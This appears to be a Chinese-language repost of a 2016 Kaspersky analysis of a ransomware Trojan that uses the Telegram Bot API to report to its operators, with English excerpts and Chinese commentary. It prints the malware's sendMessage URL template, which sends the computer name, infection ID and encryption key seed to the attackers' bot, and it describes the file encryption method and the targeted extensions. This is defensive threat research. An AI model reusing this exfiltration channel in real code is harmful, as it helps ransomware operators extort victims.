1、研究人员发现首个利用电报协议的恶意软件
标题:The first cryptor to exploit Telegram
作者信息:November 8, 2016. 10:52 am By Anton Ivanov, Fedor Sinitsyn
//BEGIN
Earlier this month, we discovered a piece of encryption malware targeting Russian users. One of its peculiarities was that it uses Telegram Messenger’s communication protocol to send a decryption key to the threat actor. To our knowledge, this is the first cryptor to use the Telegram protocol in an encryption malware case.
What is a cryptor?
In general, cryptors can be classified into two groups: those which maintain offline encryption and those which don’t.
There are several reasons why file encryption malware requires an Internet connection. For instance, the threat actors may send an encryption key to the cryptor and receive data from it which they can later use to decrypt the victim’s encrypted files.
Obviously, a special service is required on the threat actor’s side to receive data from the cryptor malware. That service must be protected from third-party researchers, and this creates extra software development costs.
俄罗斯的即时通信用户又尝鲜了:其常用的即时聊天工具Telegram Messenger被用来作为勒索用户的工具和管道了:本月卡巴的安全研究人员首次发现了利用开源的Telegram Messenger的通信协议传递加密秘钥的恶意代码。
加密密码一般分为两种,一种是在线的一种是离线的。目前流行的恶意代码都喜欢采用在线的加密的方式。
//END
Analyzing the Telegram Trojan
The Telegram Trojan is written in Delphi and is over 3MB in size. After launching, it generates a file encryption key and an infection ID (infection_id).
Then it contacts the threat actors using the publicly available Telegram Bot API and operates as a Telegram bot, using the public API to communicate with its creators.
In order for that to happen, the cybercriminals first create a “Telegram bot”. A unique token from the Telegram servers identifies the newly-created bot and is placed into the Trojan’s body so it can use the Telegram API.
The Trojan then sends a request to the URL https://api.telegram.org/bot<token>/GetMe, where <token> the unique ID of the Telegram bot, created by the cybercriminals, is stored. According to the official API documentation, the method ‘getMe’ helps to check if a bot with the specified token exists and finds out basic information about it. The Trojan does not use the information about the bot that the server returns.
The Trojan sends the next request using the method ‘sendMessage’ which allows the bot to send messages to the chat thread of the specified number. The Trojan then uses the chat number hardwired into its body, and sends an “infection successful” report to its creators:
https://api.telegram.org/bot<token>/sendmessage?chat_id=<chat>&text=<computer_name>_<infection_id>_<key_seed>
The Trojan sends the following parameters in the request:
<chat> – number of the chat with the cybercriminal;
<computer_name> – name of the infected computer;
<infection_id> – infection ID;
<key_seed> – number used as a basis to generate the file encryption key.
After sending the information, the Trojan searches the hard drives for files with specific extensions, and encrypts them bytewise, using the simple algorithm of adding each file byte to the key bytes.
该勒索木马采用Dephi语言编写,木马的大小为3MB。一旦启动就会产生一个唯一的加密文件的密码以及一个感染的ID密码:token。随后该勒索木马就会通过Telegram Messenger的公开的API接口与木马的制作者进行联系。用这个感染的ID密码来识别感染的用户。加密文件选择的是用户可能有价值的文档文件,11种文档类型为doc,docx,xls,xlsx,jpg,jpeg,png,dt,dbf,cd以及pdf。而加密的方式则是一个字节一个字节加密文件,当然只是简单的给每个原始文件的单个字节增加一个密数。
点评:Telegram Messenger虽然号称是最安全的即时聊天工具之一,而正是由于其同时的开源特性,可以被勒索软件通过建立僵尸站点的方式利用起来诈骗用户。 |